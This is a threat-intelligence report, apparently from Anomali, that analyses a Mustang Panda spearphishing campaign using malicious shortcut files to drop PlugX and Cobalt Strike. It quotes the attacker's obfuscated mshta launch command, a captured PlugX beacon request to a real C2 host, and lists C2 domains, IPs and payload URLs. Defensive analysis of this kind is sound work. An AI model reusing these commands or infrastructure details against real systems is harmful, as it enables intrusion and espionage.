of Vietnam (CVP)</li> <li>The Shan Tai; a group of people living in Southeast Asia, which Minority Rights Group International describes as a “minority” in the region, with members who are primarily Theravada Buddhists</li> </ul> <p>The malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike. The observed TTPs consist of the following:</p> <ol> <li>Use of zip file that contains a “.lnk” (Windows Shortcut) file.</li> <li>Utilization of double extension trick (sample.doc.lnk) to convince users to open the file.</li> <li>HTA (HTML Application) with VBScript embedded in the “.lnk” file</li> <li>VBScript drops payloads and opens a decoy document or PDF to the user.</li> <li>Usage of PlugX and Cobalt Strike payloads.<sup>[2]</sup></li> </ol> <p>The infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.</p> <p style="text-align: center;"><em><img alt="Figure 1 – Infection vector" src="https://cdn.filestackcontent.com/y4n8QQVFSSueTIlWKe2T"/><br/> Figure 1 – Infection vector</em></p> <p>We also found similarities in targeting in Mongolia and an NGO. The use of United Nations’ documents regarding activities in the Middle East may also be indicative of think-tank targeting. Furthermore, the use of PlugX malware also aligns with CrowdStrike’s previous findings of activity attributed to Mustang Panda.<sup>[3]</sup></p> <p>Analysts’ note: The language capabilities to read some of the lure documents is not available within Anomali at this time. We would encourage those with the language skills necessary to analyze the documents further.</p> <h2>Targeting</h2> <p>In mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence collection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing is being utilized because it aligns with Mustang Panda’s TTPs, and it is a common tactic used amongst APT actors. The lure documents are also too specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.</p> <p>Further analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a Cobalt Strike Beacon (penetration-testing tool) or PlugX (Remote Access Tool (RAT); other payloads were unable to be identified as of this writing. Anomali researchers identified 15 malicious documents that we believe were utilized by Mustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to August 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which will be analyzed further in the following sections. In addition, the dates within the documents go back as far as October 8, 2017, therefore, it is possible this activity goes back to 2017 if the group was using current content in their lures. The primary target of this campaign were found to be the ruling political party of Vietnam, The Communist Party of Vietnam (CPV); other targets observed in the malicious documents include the following:</p> <ul> <li>CPV of Lang Son province, Vietnam</li> <li>CPV of Lao Cai province, Vietnam</li> <li>Embassy of Vietnam, China</li> <li>Henan Provincial Party Committee, Vietnam</li> <li>Individuals who would find United Nations’ documents of interest, potentially think tanks</li> <li>MIAT Airlines, Mongolian airline</li> <li>Police of Sindh Province, Pakistan</li> <li>Restoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)</li> <li>The China Center (China Zentrum e.V), Germany</li> </ul> <p>The lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are publicly available. The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA script that, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. Other lure documents are themed to be relevant to their targets, and in some cases are legitimate documents that are publicly available. The final type of malicious document we observed were empty, and only contain an image, such as requesting for macros to be enabled, used to distract someone while malicious activity takes place in the background.</p> <h2>Lure Document Analysis</h2> <p>The 15 documents will be discussed below from the most recent VT submission to the earliest. The identified samples follow the same infection chain, and the technical analysis will be discussed in a later section.</p> <p><strong>Document</strong> – 1<br/> <strong>Document Title</strong> – TCO BT574.doc<br/> <strong>Sample</strong> – 05CF906B750EB335125695DA42F4EAFC<br/> <strong>Payload</strong> – Cobalt Strike<br/> <strong>Submission date</strong> – 8/29/2019 1:27:41 AM</p> <p style="text-align: center;"><em><img alt="Figure 2 – TCO BT574.doc" src="https://cdn.filestackcontent.com/jfI7wHEiQumgR8DKJtC4"/><br/> Figure 2 – TCO BT574.doc</em></p> <p>As seen above, this document is addressed to the Embassy of Vietnam in China. The document appears to discuss a warning issued to the Vietnam government related to a military exercise on a set of coordinates. Specifically, the document informs that no civilian ships are allowed on said coordinates. The document continues and mentions a new ice-breaking ship called “Snow Dragon 2” and mentions August 15, 2019, as the beginning of a 35-day trial run. This document indicates a regional interest with specificity.</p> <p><strong>Document</strong> – 2<br/> <strong>Document Title</strong> – 32_1.PDF<br/> <strong>Sample</strong> – 9A180107EFB15A00E64DB3CE6394328D<br/> <strong>Payload</strong> – Cobalt Strike Beacon<br/> <strong>Submission date</strong> – 8/26/2019 6:28:40 AM</p> <p style="text-align: center;"><em><img alt="Figure 3 – 32_1.pdf" src="https://cdn.filestackcontent.com/bvCv0P95T9GVw4hHemwO"/><br/> Figure 3 – 32_1.pdf</em></p> <p>Mustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee Lang Son Province. The Peoples’ Committee is the executive branch of a Vietnamese province.<sup>[4]</sup> The Lang Son province shares a border with China’s Guangxi Province. The area has historically served as an important location for trade, and therefore control over the location has long been disputed and fought over.<sup>[5]</sup> The border shared between China and Vietnam measures 1,281 km in length and multiple wars and numerous lives have been lost in conflicts fought, the complexities and intricacies of which will not be further discussed.<sup>[6]</sup></p> <p><strong>Document</strong> – 3<br/> <strong>Document Title</strong> – Daily News (19-8-2019)<br/> <strong>Sample</strong> – 5F094CB3B92524FCED2731C57D305E78<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 8/19/2019 6:11:32 AM</p> <p style="text-align: center;"><em><img alt="Figure 4 – Daily News (19-8-2019)" src="https://cdn.filestackcontent.com/R7QPTzQwTnebIkNjiBPD"/><br/> Figure 4 – Daily News (19-8-2019)</em></p> <p>This document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan State (RCSS). The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in Northwestern and Eastern Myanmar (Burma) and the Yunnan province in China.<sup>[7]</sup> The RCSS, also referred to as Shan State Army (SSA), is a government/political organization that is headquartered in Loi Tai Leng, Southern Shan state, in present-day Myanmar (Burma), bordering Thailand.<sup>[8]</sup> The targeting of minority groups is a known tactic used by the government of the People’s Republic of China.</p> <p><strong>Document</strong> – 4<br/> <strong>Document Title</strong> – S_2019_50_E.lnk<br/> <strong>Sample</strong> – 4FE276EDC21EC5F2540C2BABD81C8653<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/6/2019 9:37:18 AM</p> <p style="text-align: center;"><em><img alt="Figure 5 – S_2019_50_E.docx" src="https://cdn.filestackcontent.com/oCkLkzrmQNC7EtxeAv3i"/><br/> Figure 5 – S_2019_50_E.docx</em></p> <p>Mustang Panda retrieved this document from the United Nations Digital Library that is titled “Letter dated 15 January 2019 from the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253 (2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings and Entities addressed to the President of the Security Council.”<sup>[9]</sup></p> <p>At the time of this writing, it is unknown who, or what this document may be targeting. However, think-tank organizations may be interested in such a document, and said organizations were found to be targets of Mustang Panda by CrowdStrike.<sup>[10]</sup></p> <p><strong>Document</strong> – 5<br/> <strong>Document Title</strong> – European.lnk<br/> <strong>Sample</strong> – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/5/2019 6:28:25 PM</p> <p style="text-align: center;"><em><img alt="Figure 6 – European.lnk" src="https://cdn.filestackcontent.com/bwhR0rpIQgpxDhmMMSEc"/><br/> Figure 6 – European.lnk</em></p> <p>“European.doc” is targeting The China Center (China Zentrum e.V) is, according to its website, a non-profit organization that “encourages encounters and exchange between cultures and religions in the West and in China. The members of the China-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”<sup>[11]</sup></p> <p>Targeting of NGOs was first documented by CrowdStrike and we believe we have observed Mustang Panda attempting to attack a similar type of target.<sup>[12]</sup> In addition, an institution focused on exchanging cultural knowledge aligns with China’s strategic interests.</p> <h2>Targeting Pakistan</h2> <p>Upon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali found a malicious sample that targets the Police of the Sindh Province in Pakistan. The PlugX malware has been observed as the payload that is targeting the Sindh Province police.</p> <p style="text-align: center;"><em><img alt="Figure 7 – Samples Connecting to apple-net[.]com" src="https://cdn.filestackcontent.com/4fEHm9JlTOic9xhJQi9Y"/><br/> Figure 7 – Samples Connecting to apple-net[.]com</em></p> <p style="text-align: center;"><em><img alt="Figure 8 – DSR &amp; CSR of Special Branch Sind.exe" src="https://cdn.filestackcontent.com/4YdqcEqKSYKupmOdV1w8"/><br/> Figure 8 – DSR &amp; CSR of Special Branch Sind.exe</em></p> <h2>Technical Analysis</h2> <p>The “.lnk” files being utilized by MustangPanda typically contain an embedded HTA file with VBscript or PowerShell script that, once executed, will drop and open the decoy document while malicious activity of the payload runs in the background. Throughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.</p> <p style="text-align: center;"><em><img alt="Figure 9 – Infection vector" src="https://cdn.filestackcontent.com/lX9bt3vfQHmuNwsCxLa5"/><br/> Figure 9 – Infection vector</em></p> <h3>“.lnk” File Analysis</h3> <p>In Windows “.lnk” is the file extension for shortcut files which points to an executable file. “.lnk” files usually holds plenty of forensic artifacts and they can reveal valuable information about the threat actor’s environment. The metadata from the “.lnk” files led us to pivot to more samples from the same campaign.</p> <p style="text-align: center;"><em><img alt="Figure 10 – “.lnk” File" src="https://cdn.filestackcontent.com/lhM4qsRRaWc1LgysWwtQ"/><br/> Figure 10 – “.lnk” File</em></p> <p>Table 1 below shows the files that were part of the recent campaign from Mustang Panda.</p> <p style="text-align: center;"><em>Table 1 – Analyzed Samples</em></p> <table class="table table-striped" style="table-layout: fixed;"> <tbody> <tr> <th>MD5</th> <th>Link Creation Date</th> <th>File Name</th> <th>Payload</th> </tr> <tr> <td style="word-wrap: break-word;">165F8683681A4B136BE1F9D6EA7F00CE</td> <td>11/21/10 3:24</td> <td>chuong trinh dang huong.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9FF1D3AF1F39A37C0DC4CEEB18CC37DC</td> <td>11/21/10 3:24</td> <td>European.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">4FE276EDC21EC5F2540C2BABD81C8653</td> <td>11/21/10 3:24</td> <td>S_2019_50_E.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11ADDA734FC67B9CFDF61396DE984559</td> <td>11/21/10 3:24</td> <td>Chuong trinh hoi nghi.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">08F25A641E8361495A415C763FBB9B71</td> <td>11/21/10 3:24</td> <td>GIAY MOI.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">01D74E6D9F77D5202E7218FA524226C4</td> <td>11/21/10 3:24</td> <td>421 CV.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">6198D625ADA7389AAC276731CDEBB500</td> <td>11/21/10 3:24</td> <td>GIAYMOI.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9B39E1F72CF4ACFFD45F45F08483ABF0</td> <td>11/21/10 3:24</td> <td>CV trao doi CAT Cao Bang.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">748DE2B2AA1FA23FA5996F287437AF1B</td> <td>11/20/10 21:29</td> <td>cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">5F094CB3B92524FCED2731C57D305E78</td> <td>11/21/10 3:24</td> <td>Daily News (19-8-2019)(Soft Copy).lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">9A180107EFB15A00E64DB3CE6394328D</td> <td>11/21/10 3:24</td> <td>32_1.PDF.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">05CF906B750EB335125695DA42F4EAFC</td> <td>11/21/10 3:24</td> <td>TCO BT 574.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">F62DFC4999D624D01E94B89946EC1036</td> <td>11/21/10 3:24</td> <td>sach tham khao Bo mon.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">CA775717D000888A7F71A5907B9C9208</td> <td>11/21/10 3:24</td> <td>tieu luan ve quyen lam chu cua nhan dan.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">AA115F20472E78A068C1BBF739C443BF</td> <td>11/21/10 3:24</td> <td>vai tro cua nhan dan.doc.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11511b3d69fbb6cceaf1dd0278cbedfb</td> <td>11/21/10 3:24</td> <td>For National Department Sar KNU JMC people Meeting 2019.lnk</td> <td>PlugX</td> </tr> </tbody> </table> <p>Once the user opens the “.lnk” file, the embedded HTA file will be executed via “mshta.exe”, it then writes a PowerShell script name “3.ps1” in the “%TEMP%” directory. The PowerShell script is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.<sup>[13]</sup></p> <p style="text-align: center;"><em><img alt="Figure 11 – VBScript drops PowerShell script" src="https://cdn.filestackcontent.com/Q6vUTjTPeLSiovqEWB4w"/><br/> Figure 11 – VBScript drops PowerShell script</em></p> <p style="text-align: center;"><em><img alt="Figure 12 – Using WMI to execute PowerShell Script in Hidden window" src="https://cdn.filestackcontent.com/jy9OTfjRruoJJpllyO7G"/><br/> Figure 12 – Using WMI to execute PowerShell Script in Hidden window</em></p> <p>The dropped file “3.ps1” is a base64 encoded PowerShell script. Upon execution it performs the below operations on the target host:</p> <ol> <li>Checks if the user has Administrator privilege</li> <li>Drops the Cobalt Strike Stager in debug or “%TEMP%” directory as “tmp_FlVnNI.dat” depending on the user privilege</li> <li>Opens the decoy Word document</li> <li>Locates the InstallUtil.exe and its installed version</li> <li>Copies “schtasks.exe” to “%TEMP%” directory and renames it to “wtask.exe”</li> <li>Creates Scheduled tasks with the name “Security Script kb00855787”</li> <li>Renames “wscript.exe” into “winwsh.exe”</li> <li>Runs the scheduled task to execute the Cobalt Strike Stager</li> <li>C2 communication</li> </ol> <p style="text-align: center;"><em><img alt="Figure 13 – Scheduled Task Creation" src="https://cdn.filestackcontent.com/unrWhdRtTACc7O1MhLzx"/><br/> Figure 13 – Scheduled Task Creation</em></p> <p style="text-align: center;"><em><img alt="Figure 14 – PowerShell Script Creates Scheduled Task" src="https://cdn.filestackcontent.com/RfyFg3DQuOFIYxoAshL5"/><br/> Figure 14 – PowerShell Script Creates Scheduled Task</em></p> <p style="text-align: center;"><em><img alt="Figure 15 – Cobalt Strike Payload" src="https://cdn.filestackcontent.com/2OfnXlVCQquS5ftxheGA"/><br/> Figure 15 – Cobalt Strike Payload</em></p> <p>During our analysis, we could not acquire the second stage payload as the C2 servers were not functioning or had been taken down by the threat actors.</p> <h3>PlugX Payload Analysis</h3> <p>“.lnk” files that used PlugX as the payload were abnormally big in size. In general, the “.lnk” files are less than 10Kb, but the malicious samples in the campaign were more than 700Kb. Upon taking a closer look we found that the “.lnk” files were embedded with 3 base64 encoded executables.</p> <p>Upon opening the LNK file, it will then proceed to execute the below command via cmd.exe.</p> <p><strong>command:</strong> /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir "%x ieu luan ve quyen lam chu cua nhan dan.docx.lnk" /s /b') do start m%windir:~-1,1%hta .exe "%i"</p> <p>The command executes the HTA file embedded inside the shortcut and it decodes and drops 3 executables in the “%TEMP%” directory and opens a decoy word document to the user.</p> <p style="text-align: center;"><em><img alt="Figure 16 – Extracted binaries and Decoy document" src="https://cdn.filestackcontent.com/KLb2O2GOTgGYHNRAFWDV"/><br/> Figure 16 – Extracted binaries and Decoy document</em></p> <p>All three dropped files were then moved to a new folder “C:ProgramDataMicrosoft Malware ProtectionGHQ”</p> <p style="text-align: center;"><em><img alt="Figure 17 – Binaries moved to different path" src="https://cdn.filestackcontent.com/85tIfVOtT8WVTb3jSa2o"/><br/> Figure 17 – Binaries moved to different path</em></p> <p>The “3.exe” is a legitimate executable and it is signed by “ESET, spol. s r.o.” and it is being abused for DLL hijacking technique to execute http_dll.dll which decodes and loads the malicious payload http_dll.dat.</p> <p style="text-align: center;"><em>Table 2 – PlugX Hashes</em></p> <table class="table table-striped" style="table-layout: fixed;"> <thead> <tr> <th>File Name</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>3.exe (original name: EHttpSrv.exe)</td> <td style="word-wrap: break-word;">28C6F235946FD694D2634C7A2F24C1BA</td> </tr> <tr> <td>http_dll.dll</td> <td style="word-wrap: break-word;">9912EB641EABD640A476720C51F5E3AD</td> </tr> <tr> <td>http_dll.dat</td> <td style="word-wrap: break-word;">2BC7298A57AE2B8AB5B4A7B53360EB5C</td> </tr> </tbody> </table> <p>After the payload execution it reaches out to the C2 via POST request as shown below.</p> <pre> POST /update?wd=4337295e HTTP/1.1 Accept: */* x-debug: 0 x-request: 0 x-content: 61456 x-storage: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; Host: aridndvn.ccom:443 Content-Length: 0 Proxy-Connection: Keep-Alive Pragma: no-cache</pre> <p>If the C2 is not available the payload tries to reach different embedded C2 domains on unique ports.</p> <p style="text-align: center;"><em><img alt="Figure 18 – Network connections to C2" src="https://cdn.filestackcontent.com/wONhRfObTXCh731MRBQz"/><br/> Figure 18 – Network connections to C2</em></p> <h2>Conclusion</h2> <p>The malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. The targets, indicated by specific lure documents, are government or align strategically with a China-sponsored APT group. China is currently in its 13th Five-Year Plan (2016-2020) that focus on the following themes: innovation, coordinated development, green growth, openness, and inclusive growth, respectively.<sup>[14]</sup> The objective of increasing exports and specific imports, which falls under openness, would align with the targeting of the Lang Son province and its history of trade. Utilizing lures themed around political parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of China’s development strategy” and attempts of “enhancing its future global competitiveness and technological edge.”<sup>[15]</sup> Targeting entities, or related entities, of said lures indicates a potential regional interest in strategic information that may be of significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by Anomali.</p> <p>This activity has been ongoing since at least November 2018, and possibly as far back to at least October 2017 if the lure documents were distributed around the times mentioned in them. This kind of malicious activity sponsored by China will likely continue as the country expands its efforts for the ongoing Belt and Road Initiative that seeks to invest in infrastructure in over 100 countries. Such economic and investment-led initiatives will cause China to be more interested in the regions its investing in, therefore it is likely that APT-related activity will follow.</p> <h2>IOCs</h2> <p>In addition, ATR found that the documents were attempting to, or were able to connect to the following Command and Control (C2) domains and IP addresses:</p> <table class="table table-striped"> <tbody> <tr> <th>Domain</th> <th>IPs</th> <th>First Seen</th> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.94</td> <td>6/29/19 22:03</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.67</td> <td>6/24/19 16:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.82</td> <td>6/7/19 1:31</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.94</td> <td>6/22/19 3:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.82</td> <td>6/19/19 14:24</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.71</td> <td>6/10/19 6:57</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.73</td> <td>6/1/19 9:49</td> </tr> <tr> <td>adobephotostage.com</td> <td>207.148.12.47</td> <td>6/7/18 10:05</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.41</td> <td>6/4/18 11:33</td> </tr> <tr> <td>adobephotostage.com</td> <td>207.148.78.101</td> <td>5/31/18 3:26</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.149</td> <td>5/24/18 7:19</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.59</td> <td>5/22/18 20:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.200</td> <td>9/11/19 23:17</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.199</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.197</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.198</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>162.255.119.150</td> <td>7/25/19 8:20</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.148</td> <td>6/12/19 23:41</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.177.224</td> <td>3/22/19 3:11</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.3</td> <td>10/29/18 12:21</td> </tr> <tr> <td>apple-net.com</td> <td>45.248.87.14</td> <td>10/21/18 18:20</td> </tr> <tr> <td>apple-net.com</td> <td>91.195.240.117</td> <td>8/6/18 7:08</td> </tr> <tr> <td>apple-net.com</td> <td>103.224.182.250</td> <td>4/25/18 11:40</td> </tr> <tr> <td>wbemsystem.com</td> <td>167.88.177.224</td> <td>7/29/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>167.88.178.24</td> <td>7/4/19 13:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>6/25/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>4/3/19 1:17</td> </tr> <tr> <td>yahoorealtors.com</td> <td>45.77.209.52</td> <td>1/18/18 7:11</td> </tr> <tr> <td>infosecvn.com</td> <td>167.88.178.118</td> <td>8/27/19 2:14</td> </tr> <tr> <td>infosecvn.com</td> <td>185.239.226.61</td> <td>7/10/18 1:02</td> </tr> <tr> <td>infosecvn.com</td> <td>45.77.184.12</td> <td>5/30/18 16:29</td> </tr> <tr> <td>airdndvn.com</td> <td>167.88.178.118</td> <td>6/27/19 0:00</td> </tr> <tr> <td>airdndvn.com</td> <td>185.239.226.61</td> <td>6/14/18 9:43</td> </tr> <tr> <td>airdndvn.com</td> <td>45.77.184.12</td> <td>5/31/18 13:50</td> </tr> <tr> <td>officeproduces.com</td> <td>45.32.50.150</td> <td>7/25/19 7:10</td> </tr> <tr> <td>web.adobephotostage.com</td> <td> </td> <td> </td> </tr> <tr> <td>Web.officeproduces.com:8080</td> <td> </td> <td> </td> </tr> <tr> <td>Up.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>We.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>Download.officeproduces.com:443</td> <td> </td> <td> </td> </tr> <tr> <td>geocities.jp</td> <td> </td> <td> </td> </tr> <tr> <td>update.olk4.com:53</td> <td> </td> <td> </td> </tr> <tr> <td>www.cab-sec.com</td> <td>167.88.180.15</td> <td>09/18/2019 3:10</td> </tr> <tr> <td> </td> <td>43.254.217.67</td> <td> </td> </tr> <tr> <td> </td> <td>154.221.24.47</td> <td> </td> </tr> <tr> <td> </td> <td>144.202.54.86</td> <td> </td> </tr> </tbody> </table> <h2>URLs</h2> <ul> <li>http://144.202.54.86/vkt2</li> <li>http://144.202.54.86/download/Mau2.hta</li> <li>http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx</li> <li>http://airdndvn.com/6CDC9F833C87FB661DBB9339</li> <li>http://www.wbemsystem.com/B2FC407BB86E8219/397A4853</li> <li>web.officeproduces.com:8000/update?wd=1b1fe9aa</li> <li>154.221.24.47/HaQ3</li> </ul> <h2>File Hashes</h2> <p>165F8683681A4B136BE1F9D6EA7F00CE<br/> 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> 4FE276EDC21EC5F2540C2BABD81C8653<br/> 11ADDA734FC67B9CFDF61396DE984559<br/> 08F25A641E8361495A415C763FBB9B71<br/> 01D74E6D9F77D5202E7218FA524226C4<br/> 6198D625ADA7389AAC276731CDEBB500<br/> 9B39E1F72CF4ACFFD45F45F08483ABF0<br/> 748DE2B2AA1FA23FA5996F287437AF1B<br/> 5F094CB3B92524FCED2731C57D305E78<br/> 9A180107EFB15A00E64DB3CE6394328D<br/> 05CF906B750EB335125695DA42F4EAFC<br/> F62DFC4999D624D01E94B89946EC1036<br/> CA775717D000888A7F71A5907B9C9208<br/> AA115F20472E78A068C1BBF739C443BF</p> <h2>Endnotes</h2> <p><sup>[1]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog, accessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.</p> <p><sup>[2]</sup> Ibid.</p> <p>[3] Ibid.</p> <p><sup>[4]</sup> Dr. Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016): 5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.</p> <p><sup>[5]</sup> Kathy Wilheml, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over Friendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times, accessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.</p> <p><sup>[6]</sup> “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019, https://www.globalsecurity.org/military/world/vietnam/geography.htm.</p> <p><sup>[7]</sup> The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019, https://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019, https://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.</p> <p><sup>[8]</sup> “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018, https://www.mmpeacemonitor.org/1598.</p> <p><sup>[9]</sup> https://digitallibrary.un.org/record/1663461. Accessed September 18, 2019.</p> <p><sup>[10]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[11]</sup> http://www.china-zentrum.de/. Accessed September 18, 2019.</p> <p><sup>[12]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[13]</sup> Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019, https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.</p> <p><sup>[14]</sup> Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission, accessed September 20, 2019, published February 14, 2017, https://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf. 3.</p> <p><sup>[15]</sup> Ibid.</p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.